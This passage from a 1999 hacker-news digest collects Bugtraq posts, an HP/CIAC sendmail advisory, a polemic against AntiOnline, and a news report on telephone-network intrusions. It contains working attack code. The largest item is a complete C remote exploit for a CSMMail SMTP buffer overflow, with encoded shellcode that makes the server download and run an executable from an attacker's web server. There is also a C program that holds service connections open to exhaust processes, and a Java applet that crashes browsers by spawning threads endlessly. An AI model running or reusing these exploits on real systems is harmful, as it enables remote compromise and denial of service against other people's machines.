to access this share. One simpler scenario: install a service. Exceed MAX_PATH. Start this service at system startup - watch the server rebooting. THIS IS A BUG - No excuse. --- Thomas Schweikle @HWA 44.0 CSMMail Windows SMTP Server Remote Buffer Overflow Exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 27 Apr 1999 13:44:51 -0400 From: pw To: BUGTRAQ@netspace.org Subject: CSMMail Windows SMTP Server Remote Buffer Overflow Exploit CSMMail is a SMTP server for win95/98/NT with features that include at least five stack overflows. At least two of these allow remote execution of arbitrary code. The first the overflow is found in the HELO command, there is also an overflow in the MAIL FROM: command, however, I have been unable to get either of these to return to an arbitrary address. The next overflow I found was in the VRFY command, when a long string is used as an argument ("VRFY aaaaaaa....") one can overwrite the return address and force the server to return to arbitrary code. This is the overflow the following exploit takes advantage of. There is also another buffer overflow in the VRFY command which happens if one enters "VRFY aaaa@aaaaaaa......" I have not been able to make this return to an arbitrary address. The RCPT TO: command also has a overflow in it that can be used to return to arbitrary code. There are two main problems which are run into when exploiting the first hole in the VRFY command. The first one is trivial to get around. If a "@" sign (40h) is found on the buffer being copied and the buffer is excessively long it will not overflow the buffer. To get around this we just make sure 40h is not in our code or offseted addresses. The next problem stems from the fact that CSM Mail has no DLL's of it's own which are loaded in its address space and it's Image Base is 00400000h. Since we will have to include a null to address to any of CSMMail's code there is no sure way to return to our code. To get around this I have included multiple return addresses in the exploit which are bound directly to the operating system version which CSM Mail is running under. It is also worth noting that two of the arguments for the function which is having it's return address overwritten need to be fixed up with a valid read memory location in order to bypass page faults. The exploit that is included below will force CSMMail to connect to a specified web server and download, save and execute a file from it. The exploit should work under x86 unix's and x86 versions of win32. By default it is set to be compiled under unix, to compile it under win32 take out the "#define UNIX." I would like to thank Acpizer for porting this to win32 and determining the SP3 address values. I do not know of any bugfixes for this and this exploit works on the current version which is being distributed from their site. (It did the last time I checked it) -mcp <--------------------------CUT HERE-------------------------> #define UNIX #ifndef UNIX #include #include #include #include #define CLOSE _close #define SLEEP Sleep #else #include #include #include #include #include #include #include #define CLOSE close #define SLEEP sleep #endif /* CSMMail Exploit by _mcp_ Win32 port and sp3 address's by Acpizer Greets go out to the following people: Morpheus, Sizban, Rocket, Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite and #win32asm. You can contact me by e-mail or on efnet. As always no greets go out to etl */ const unsigned long FIXUP1 = 264; const unsigned long FIXUP2 = 268; const unsigned long OFFSET = 260; char code[] = "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB" "\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46" "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3" "\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66" "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33" "\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51" "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6" "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF" "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57" "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1" "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66" "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D" "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46" "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F" "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66" "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53" "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30" "\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } #ifndef UNIX memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length); #else bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); #endif return(binip); } int usages(char *fname) { printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ .\n"); printf("Win32 porting and nt sp3 address's by Acpizer \n"); printf("Usages: \n"); printf("%s \n", fname); printf("win98 SP1:\n"); printf(" = 0xBFF78030\n"); printf(" = 0xBFF79243\n"); printf("NT SP3:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E53FC7\n"); printf("NT SP4:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E9A3A4\n"); printf("Will make running CSMMail download, save, and\n"); printf("execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,targethost,sinlen; struct sockaddr_in sin; static unsigned char buffer[20000]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long rw_mem; #ifndef UNIX WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) exit(1); #endif if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0) { printf("Input Error, the fixup memory address has incorrect format\n"); exit(0); } if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0) { printf("Input error, the return address has incorrect format\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"VRFY "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr2=ptr; ptr2+=FIXUP1; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr2=ptr; ptr2+=FIXUP2; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr+=OFFSET; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); #ifndef UNIX send(sock, "HELO lamer.com\r\n",16, 0); send(sock, (char *)&buffer, strlen((char *)&buffer), 0); send(sock,"\r\n",2,0); #else write(sock, "HELO lamer.com\r\n",16); write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char *)&buffer */ write(sock,"\r\n",2); #endif SLEEP(1); printf("Sent the egg\n"); #ifndef UNIX WSACleanup(); #endif CLOSE(sock); exit(1); } @HWA 45.0 HP Sendmail 8.8.6 DoS ~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 26 Apr 1999 14:46:41 -0700 (PDT) From: CIAC Mail User To: ciac-bulletin@rumpole.llnl.gov Subject: CIAC Bulletin J-040: HP-UX Security Vulnerability in sendmail [ For Public Release ] -----BEGIN PGP SIGNED MESSAGE----- __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN HP-UX Security Vulnerability in sendmail April 26, 1999 17:00 GMT Number J-040 ___________________________________________________________________________ PROBLEM: sendmail release 8.8.6 causes Denial of Service failures. PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00 DAMAGE: Users can initiate a Denial of Service. SOLUTION: Apply the publicly available patches. ___________________________________________________________________________ VULNERABILITY The risk is high. The HP bulletin states that this should be ASSESSMENT: done as soon as possible. ___________________________________________________________________________ [Start of Hewlett-Packard bulletin] Document ID: HPSBUX9904-097 Date Loaded: 19990419 Title: Security Vulnerability in sendmail - ------------------------------------------------------------------------- HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00097, 20 April 1999 - ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. - ------------------------------------------------------------------------- PROBLEM: sendmail release 8.8.6 causes Denial of Service failures. PLATFORM: HP 9000 Series 700/800 Servers running HP-UX 10.20 and 11.00 DAMAGE: Users can initiate a Denial of Service. SOLUTION: Apply the patches listed below. AVAILABILITY: All patches are available now. - ------------------------------------------------------------------------- I. A. Background Hewlett-Packard Company HP9000 Series 700/800 systems that are running sendmail release 8.8.6 accept connections sub-optimally, which cause security problems. Public domain fixes now in sendmail 8.9.3 have been ported to HP-UX sendmail 8.8.6 release patch. B. Fixing the problem For HP-UX releases prior to 10.20, upgrade from sendmail 5.65 to sendmail release 8.8.6. See www.software.hp.com For HP-UX release 10.20: PHNE_17135; For HP-UX release 11.00: PHNE_17190. C. To subscribe to automatically receive future NEW HP Security Bulletins or access the HP Electronic Support Center, use your browser to get to our ESC web page at: http://us-support.external.hp.com (for non-European locations), or http://europe-support.external.hp.com (for Europe) Login with your user ID and password (or register for one). Remember to save the User ID/password assigned to you. Once you are in the Main Menu: To -subscribe- to future HP Security Bulletins, click on "Support Information Digests". To -review Security bulletins already released-, click on the "Search Technical Knowledge Database." To -retrieve patches-, click on "Individual Patches" and select appropriate release and locate with the patch identifier (ID). To -browse the HP Security Bulletin Archive-, select the link at the bottom of the page once in the "Support Information Digests". To -view the Security Patch Matrix-, (updated daily) which categorizes security patches by platform/OS release, and by bulletin topic, go to the archive (above) and follow the links. The security patch matrix is also available via anonymous ftp: us-ffs.external.hp.com or ~ftp/export/patches/hp-ux_patch_matrix D. To report new security vulnerabilities, send email to security-alert@hp.com Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com. Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party. ________________________________________________________________________ - -----End of Document ID: HPSBUX9904-097----------------------------------- [End of Hewlett-Packard bulletin] ___________________________________________________________________________ CIAC wishes to acknowledge the contributions of Hewlett-Packard Company for the information contained in this bulletin. ___________________________________________________________________________ CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at: Voice: +1 925-422-8193 FAX: +1 925-423-8002 STU-III: +1 925-423-2604 E-mail: ciac@llnl.gov For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), call the CIAC voice number 925-422-8193 and leave a message, or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC duty person, and the secondary PIN number, 8550074 is for the CIAC Project Leader. Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive. World Wide Web: http://www.ciac.org/ (or http://ciac.llnl.gov -- they're the same machine) Anonymous FTP: ftp.ciac.org (or ciac.llnl.gov -- they're the same machine) Modem access: +1 (925) 423-4753 (28.8K baud) +1 (925) 423-3331 (28.8K baud) CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority - time critical information and Bulletins, important computer security information; 2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name: E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov: subscribe list-name e.g., subscribe ciac-bulletin You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question. If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc. PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization. A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/. This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC) J-030: Microsoft BackOffice Vulnerability J-031: Debian Linux "Super" package Buffer Overflow J-032: Windows Backdoors Update II: J-033: SGI X Server Font Path Vulnerability J-034: Cisco 7xx TCP and HTTP Vulnerabilities J-035: Linux Blind TCP Spoofing J-036: LDAP Buffer overflow against Microsoft Directory Services J-037: W97M.Melissa Word Macro Virus J-038: HP-UX Vulnerabilities (hpterm, ftp) J-039: HP-UX Vulnerabilities (MC/ServiceGuard & MC/LockManager, DES -----BEGIN PGP SIGNATURE----- Version: 4.0 Business Edition iQCVAwUBNySJe7nzJzdsy3QZAQHNBwP/c9SF9GjFRwhkNjYdr6Hs7eyAdh23JoKE jcWLPR3qIdBg/uENXqe6Jz+G9t5V4qORE592wi+KgLNuLypm2A4wHmJS7Agdb8Pt DilC6Kh5VRGUtn+TknLRLcj1DsHpTnaJ5cmN3ozvqX1H566xfn2jexWSuHujECH3 fz8VGVHwfpE= =7fHx -----END PGP SIGNATURE----- @HWA 46.0 KKI inactive connections security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 28 Apr 1999 13:59:28 +0200 From: Lukasz Luzar To: BUGTRAQ@netspace.org Subject: KKIS.28041999.002.b ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Raport title : Flaws in implementations of mechanisms which prevents from maintaining the parasitize connections in many tcp network services. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Raport created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 28 April 1999 Raport code : KKIS.28041999.002.b Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ... Systems affected : Linux, FreeBSD, Solaris, ... Archive : http://www.security.kki.pl/advisories/ Risk level : low ~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The designers of many popular network services are trying to make the mechanisms which should prevents from maintaining the parasitize connections to their programs. The exercise of such protection is timeout, which closes inactive connections. But some of those designers forgets that some malicious guys may often and fraquently send strings full of bad or null commands to the open port of the service. Such situation might happen before login/password authentication of the connection. Those programmers should implement additional mechanisms to prevent such situations. Good solution is to put counter of bad (or null) commands inside the program. For example, the similiar mechanism has been applied in sendmail. This soluition is effective and very easy to implement. Lack of this mechanism may be quite threateing, because most of that tcp services are working with root privilages, and the bounds of amount of root proceses isn't easy, when the service has no internal bound. That affects whole system, when proccess table is fulfiled for example by multiply open connections to the vulnerable tcp service. Worst situation is, when vulnerable service doesn't logs any information about connection before authentication with login/password. One of this most vulnerable services is cucipop. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Below example shows how to open and maintain the connection, which might state open by undefined time. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- CUT HERE --- /* * example.c by Lukasz Luzar (lluzar@security.kki.pl) */ #include #include #include #include #include #include #include /* victim's address and port of service */ #define ADDR "10.0.0.1" //IP in dot natation #define PORT 110 //e.g. some pop3 #define DELAY 4 //(4 secs.) how often we are sending bad commands #define COMMAND "\n" //some bad (or null) command void main() { int sockfd, j,k; struct sockaddr_in victim_addr; bzero((char *) &victim_addr, sizeof( victim_addr)); victim_addr.sin_family = AF_INET; victim_addr.sin_addr.s_addr = inet_addr( ADDR); victim_addr.sin_port = htons( PORT); if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0) fprintf( stderr, "socket error\n"); if( connect( sockfd,(struct sockaddr*) &victim_addr, sizeof( victim_addr)) < 0) fprintf( stderr,"connect error\n"); k = 1; if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0) fprintf( stderr,"setsockopt error\n"); j = strlen( COMMAND); for(;;) { if( write( sockfd,COMMAND,j) == -1) fprintf( stderr,"write error\n"); fprintf( stderr,"."); sleep( DELAY); } } --- CUT HERE --- ~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ @HWA 47.0 How to achieve the status JP has with AntiOnline (from PacketStorm) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AntiOnline Mini-howto Shark Fin, ph1sh@pmc.com.au v1.0, 28 April 1999 This document discusses the techniques used and implemented by well known `media whore' John Vranesevich (aka JP). It also includes full details of how you to can implement such techniques to achieve the same status as JP has. This document is not endorsed nor sponsored by AntiOnline. _____________________________________________________________________ Table of Contents 1. Introduction 1.1 Overview 1.2 History 1.3 Future Revisions 1.4 Feedback 1.5 Copyright 1.6 Standard Disclaimer 2. What is AntiOnline 3. Techniques used by AntiOnline 3.1 The `rip' 3.2 The `narq' 3.3 IRC Warrior acts 4. Overview _____________________________________________________________________ 1. Introduction 1.1 Overview The purpose of this document is to discuss and detail the deplorable morals and techniques implemented by JP and the running of his website. It will shed important light on the true workings of AntiOnline for newcomers. This document is not endorsed nor sponsered by AntiOnline in any way. 1.2 History - v1.0 Descripion of morals and techniques employed by AntiOnline 1.3 Future Revisions If the deplorable and unprecedented acts of commercialism, `narqing', code ripping, IRC Warrior Acts, lying, plagorism. etc. that we have come to expect from AntiOnline there should be future revisions of this document. 1.4 Feedback I welcome any feedback on this document to ph1sh@pmc.com.au, comments supporting or defending AntiOnline's morals are symlinked to /dev/null . 1.5 Copyright The AntiOnline Mini-howto is copyrighted (c)1999 ph1sh (yes, you to JP) 1.6 Standard Disclaimer I disavow any potential liability for the contents of this document. Use it at your own risk. Rest assured however that the contents of this document are all verified. 2. What is AntiOnline? The AntiOnline Network per-se, is a collection of sites, all ripped by JP (jp@antionline.com) and his side kicks. It was originally developed by JP in order 'to educate the public'. However, it bemises me how someone who knows so little about computer security can educate a thriving online community. And as the host of the newly found D.o.S tool, `muerte', being the main feature of the site, I also fail to see how the public is educated in any way. AntiOnline was then moved to the University of Pittsburgh, where JP was attending college. In time, someone at Pitt actually got a clue and removed the site from the College server, obviously identifying that the site's content and aims had nothing in common at all. AntiOnline was duly moved to a Lazerlink account where it grew in retardedness unbelievebly, posting ripped code and articles where ever it could be done. In true JP fashion, he has recently become a commercial sell-out by hooking up with a couple of corporate sponsers and purchasing expensive software just so he can make a neat hack attempts page. 3. Techniques used by AntiOnline 3.1 The `rip' AntiOnline is notorious for publishing plagorised material. This would probably represent the true lack of knowledge attained by JP, and his lack of pride and creativity. Prime examples include the Buffer Overflow special report (http://www.antionline.com/SpecialReports/buffer_overflows), compare this to aleph1's 'smashing the stack for fun and profit' released in Phrack 49. More recent examples of ripping by AntiOnline, are the layout to AntiCode, completely ripped from freshmeat.net, and the editing of code to insert credits to AntiCode, in some cases removing author credits. Lesser examples of ripping would be in ways claiming the hacker wargames as a 'product of antionline', when they were old news anyway. Also, JP's special report on hacker culture was a rip from an article posted to attrition.org 3.2 The `narq' Ok, JP will use you for publicity when you're going around using your 0-day kodez to break into lots of web sites, but are you really dealing with someone who is interested in protecting your privacy? NO. His recent reports on 'finger-printing' hackers (completely moronic) just go to show that he is out there to help authorities track you down. He is also believed to funding Carolyn P. Meinel in her efforts to track down hackers. 3.3 IRC Warrior acts Yep, hope you've got your system patched when you're sitting on IRC and JP is around, ask anyone who keeps logs of his attacks for some proof of incessant smurf attacks etc. 4.0 Overview Ok, I got bored of wasting my time writing about JP so I'll wrap it up here. AntiOnline is a collaborative effort to rip your code and steal your ideas. Please help in spreading the word by posting this howto wherever you can, and associating yourself with the right people. JP, take your legal crap somewhere else. WWW: http://ph1sh.fsn.net @HWA 48.0 Crash your browser.(JAVA) ~~~~~~~~~~~~~~~~~~~~~~~~~ Windows thread overrun from a Java Applet Whether you found this page by searching Yahoo, reading a newsgroup, received an e-mail, or any other way, you obviously came here for one of two reasons 1) you want to see what the talk is about, or 2) some "friend" of yours wanted you to get nailed by the problem. The second reason is why I created this page. I've added this as a layer of indirection, and as a way to add information as more becomes available. In the interest of security, I will periodically be changing the name of the applet and the page it's on, so that not too many people have problems from direct links Background I found this flaw as a part of some research I did beginning summer 1998, and ending December of the same. I have personally reported this security flaw on two occasions, and I am certain that the overseeing professor (B Clifford Neuman, ISI) reported it himself. I have held off on creating a public spectacle of this flaw for several months in an effort to give Sun and/or Microsoft an opportunity to correct the issue. How It Works It's rather simple, the applet simply creates more and more threads until the kernel panics. Probably the worst part is that the download is only 941 bytes, smaller than a normal picture. Basically that means that even running on a 28.8 modem the download is less than 1/3 of a second, and by the time most people would consider that there is a problem the applet is running. There is also an equivalent standard executable version, but I'm not going to discuss it here. Isn't this just a DoS (Denial of Service) attack? The debate rages on, there are some very valid points on both sides of the argument, but in the end, it doesn't really matter, this entire class of problems can be solved (more information) The Fix It should be rather simple for either Microsoft or Sun to fix it. The fix would consist simply of adding threadsafe thread counting to the thread spawning code, as well as the thread termination code. It would be most logical for Microsoft to fix the code because a standard executable that does the same thing. Why I'm Bringing The Issue Up At All Knowledge of the applet has been spreading slowly and may soon become an issue, so I'm attempting to get real information available before a problem occurs. Known Results Windows 95 Ie3.x: No data Ie4 (no alterations): crash Ie4 (jdk 1.2): crash Ie4 (jdk 1.21): crash Ie5 (no alterations): crash Ie5 (jdk 1.21): crash Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow) Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing Windows 98 Ie3.x: No data Ie4 (no alterations): crash Ie4 (jdk 1.2): crash Ie4 (jdk 1.21): crash Ie5 (no alterations): crash Ie5 (jdk 1.21): crash Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow) Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing Windows NT: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can cause a crash), system eventually becomes usable again OS2 Warp: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can cause a crash), system eventually becomes usable again UNIX (Solaris, Tru64, Linux (Alpha)): System remains usable, the browser hangs eventually Macintosh: System remains usable, the browser hangs or crashs Please email me with any new results (or even if you want to confirm the posted results) The Source I've received numerous complaints about my releasing the source code. I'm taking this time to explain the reasoning behind it. The HTTP protocol is publicly available as an RFC, which makes it easy enough for any would-be hacker to grab the applet without too much difficulty (but no one has complained about me making this applet available publicly). Therefore releasing the source code serves only to make it possible for security measures to be developed quickly, and efficiently, as well as developing protection against the entire class of attacks instead of just searching for this applet. The Page BEWARE!!!! CLICKING HERE IS NOT RECOMMENDED. The Source Questions Please feel free to email me at ashwood@usc.edu if you have any questions regarding this applet. Reporting abuse If you have run across a page that you believe has this applet (or one similar) running on it, please e-mail me at ashwood@usc.edu ASAP. I will gladly maintain the list of sites. I am not the first to find this problem I have not yet had the opportunity to verify it, but I have been informed that in the book titled "Tricks of the Java Programming Gurus" published in 1996. import java.awt.*; import java.applet.*; public class minThread extends Applet implements Runnable { Thread myThread = null; int howMany = 0; public static void main(String args[]) { minThread that = new minThread(); that.start(); } public void init() { start(); } public void start() { // we start a new thread myThread = new Thread(this); myThread.start(); run(); // the code for the new Thread is in the run() method } public void run() { try { for (;;) { myThread = new Thread(this); myThread.start(); } } catch (Exception e) { //out of memory, so waste processor for(;;) { } } } public void stop() { // myThread has to be stopped before the applet stops myThread = null; } public void destroy() { } public void paint(Graphics g) { } } 49.0 Phone Rangers break into GTE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Phone Masters Break Into GTE contributed by epter There is so much FUD (Fear, Uncertainty and Doubt)here it is hard to separate the facts from the sensationalism. Evidently a group of "cyber terrorists" known as the "Phone Rangers" broke into the computer/telephone network of GTE in the Dallas Fort Worth area. The "computer hackers" reportedly had the ability to disrupt 911 calls, shut down police departments and warn drug dealers of wire taps. The 'hacks' reportedly started over four years ago and are only now being made public. What the article does not say is whether the attacks have stopped or whether anyone has been arrested or charged with a crime. This 'report' is mostly what could have happened as opposed to what actually did happen. WFAA Dallas FortWorth TV http://www.wfaa.com/news/9904/29/cyber_terrorism_1.html N E W S 8 I N V E S T I G A T E S Cyber Terrorists Invade Phone Networks by Robert Riggs April 29 1999 GTE's network operations center at DFW International Airport was targeted by computer hackers. DALLAS -- It was the largest cyber-assault on the nation's communications networks. A computer security breach received little attention when it was announced in Dallas last month. Hackers had been caught stealing thousands of long distance calling card numbers. News 8 Investigates learned it was a case with national security implications. A group of computer hackers invaded telephone systems so deeply that they could shut down 911 operators. In fact, they retaliated for a speeding ticket by crashing the phone system at a police department. They also tipped off drug dealers to wiretaps. Until now, this cyber-attack has been a closely-guarded secret. Computer hackers have broken into the networks of the world's largest telephone companies. They were just a few keystrokes away from blinding air traffic controllers, shutting down banks, or cutting off military bases. It's not the plot of the latest cyber-horror movie. This frightening penetration of the nation's telecommunications systems actually happened right here in North Texas. The hackers' target list included GTE's 28-state network, controlled from a nerve center at DFW International Airport. They had the capability of causing a "cyber Pearl Harbor" had they wanted to. FBI Agent Mike Morris led the investigation. "We had a number of telephone companies, long distance carriers and local exchange carriers that thought the were impenetrable," Morris said. "They thought they were little castles." HACKING HISTORY The first confirmed break-in occurred four years ago when the hackers first took control of computerized phone switches. The switches route calls around the world. The hackers gained unrestricted access to GTE, Sprint, MCI and the regional Baby Bell networks. Their early attacks went undetected, and alarmed top levels of the U.S. government. Details about the case are only now becoming public. "They could listen in on calls made through that switch," Morris explained. "If they didn't like a person, they could turn their access off to that switch, meaning if you tried to make a call out, it wasn't going to happen." FBI LAUNCHES CYBER SQUAD A tip set in motion an intensive FBI investigation that continues today. In Dallas, a new cyber squad put a wiretap on the hackers' line. It marked the first time that agents could monitor everything a hacker typed. "The goal of the hackers was to basically take control of telecommunications systems coast-to-coast," Morris said. They came close. THE PHONE MASTERS FBI surveillance photos show some of the 11 hackers called the Phone Masters. 